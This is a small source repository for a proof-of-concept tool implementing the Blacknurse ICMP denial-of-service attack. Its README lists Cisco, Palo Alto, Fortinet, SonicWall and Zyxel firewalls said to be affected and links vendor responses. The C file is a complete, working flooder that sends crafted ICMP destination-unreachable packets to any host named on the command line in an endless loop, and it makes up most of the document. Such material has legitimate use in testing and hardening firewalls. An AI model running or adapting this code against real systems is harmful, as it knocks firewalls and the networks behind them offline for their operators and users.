├── .gitignore ├── LICENSE ├── Makefile ├── README.md └── blacknurse.c /.gitignore: -------------------------------------------------------------------------------- 1 | # Object files 2 | *.o 3 | *.ko 4 | *.obj 5 | *.elf 6 | 7 | # Precompiled Headers 8 | *.gch 9 | *.pch 10 | 11 | # Libraries 12 | *.lib 13 | *.a 14 | *.la 15 | *.lo 16 | 17 | # Shared objects (inc. Windows DLLs) 18 | *.dll 19 | *.so 20 | *.so.* 21 | *.dylib 22 | 23 | # Executables 24 | *.exe 25 | *.out 26 | *.app 27 | *.i*86 28 | *.x86_64 29 | *.hex 30 | 31 | # Debug files 32 | *.dSYM/ 33 | *.su 34 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 2-Clause License 2 | 3 | Copyright (c) 2016, Frank Denis 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 17 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 18 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 19 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 20 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 21 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 22 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 23 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 24 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 25 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 26 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | blacknurse: blacknurse.c 2 | $(CC) $(CFLAGS) $(LDFLAGS) -O2 -o blacknurse blacknurse.c 3 | 4 | clean: 5 | @rm -f blacknurse 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | A simple PoC for the [Blacknurse](http://www.blacknurse.dk/) attack. 2 | 3 | "Blacknurse is a low bandwidth ICMP attack that is capable of doing 4 | denial of service to well known firewalls". 5 | 6 | Blacknurse apparently makes the CPU hot on: 7 | * Cisco ASA 5505, 5506, 5515, 5525 , 5540 (default settings) 8 | * Cisco 6500 routers with SUP2T and Netflow v9 on the inbound interface - 100% CPU load 9 | * Cisco ASA 5550 (Legacy) and 5515-X (latest generation) 10 | * Cisco Router 897 - Can be mitigated 11 | * SonicWall - Misconfiguration can be changed and mitigated (Enable Anti-DDOS) 12 | * Palo Alto 5050 Firewalls with firmware 7.1.4-h2 13 | * Zyxel NWA3560-N (Wireless attack from LAN Side) 14 | * Zyxel Zywall USG50 15 | * Fortinet v5.4.1 - One CPU consumed 16 | * Fortigate units 60c and 100D (even with drop ICMP on) 17 | * SonicWall 18 | * Maybe more 19 | 20 | See [blacknurse.dk](http://www.blacknurse.dk) for the full list and updates. 21 | 22 | Vendor responses: 23 | * [Checkpoint](https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk114500) 24 | * [Fortinet](https://blog.fortinet.com/2016/11/14/black-nurse-ddos-attack-power-of-granular-packet-inspection-of-fortiddos-with-unpredictable-ddos-attacks) 25 | * [Palo Alto](http://researchcenter.paloaltonetworks.com/2016/11/note-customers-regarding-blacknurse-report/) 26 | 27 | This attack is 20+ years old, but it didn't had a logo. 28 | -------------------------------------------------------------------------------- /blacknurse.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | int main(int argc, char *argv[]) 14 | { 15 | uint8_t pkt_template[] = { 16 | 0x03, 0x03, 0x0d, 0x33, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x1c, 0x4a, 0x04, 0x00, 0x00, 17 | 0x40, 0x06, 0x20, 0xc5, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0x00, 0x00, 18 | 0x00, 0x08, 0xef, 0xc1 19 | }; 20 | uint8_t *pkt; 21 | struct addrinfo *ai, hints; 22 | const char *host; 23 | struct pollfd pfd; 24 | const size_t pkt_len = (sizeof pkt_template) / (sizeof pkt_template[0]); 25 | size_t i; 26 | int gai_err; 27 | int kindy; 28 | 29 | if (argc < 2) { 30 | fprintf(stderr, "Usage: blacknurse \n"); 31 | exit(1); 32 | } 33 | host = argv[1]; 34 | memset(&hints, 0, sizeof hints); 35 | hints.ai_family = AF_INET; 36 | if ((gai_err = getaddrinfo(host, NULL, &hints, &ai)) != 0) { 37 | fprintf(stderr, "Unable to use [%s]: %s\n", host, 38 | gai_strerror(gai_err)); 39 | exit(1); 40 | } 41 | if ((kindy = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) { 42 | perror("socket"); 43 | exit(1); 44 | } 45 | pkt = pkt_template; 46 | pfd.fd = kindy; 47 | pfd.events = POLLOUT; 48 | for (;;) { 49 | for (i = 20; i < 20 + 8 + 4; i++) { 50 | pkt[i] = (uint8_t) rand(); 51 | } 52 | if (sendto(kindy, pkt, pkt_len, 0, 53 | ai->ai_addr, ai->ai_addrlen) != (ssize_t) pkt_len) { 54 | if (errno == ENOBUFS) { 55 | poll(&pfd, 1, 1000); 56 | continue; 57 | } 58 | perror("sendto"); 59 | break; 60 | } 61 | } 62 | /* NOTREACHED */ 63 | close(kindy); 64 | freeaddrinfo(ai); 65 | 66 | return 0; 67 | } 68 | --------------------------------------------------------------------------------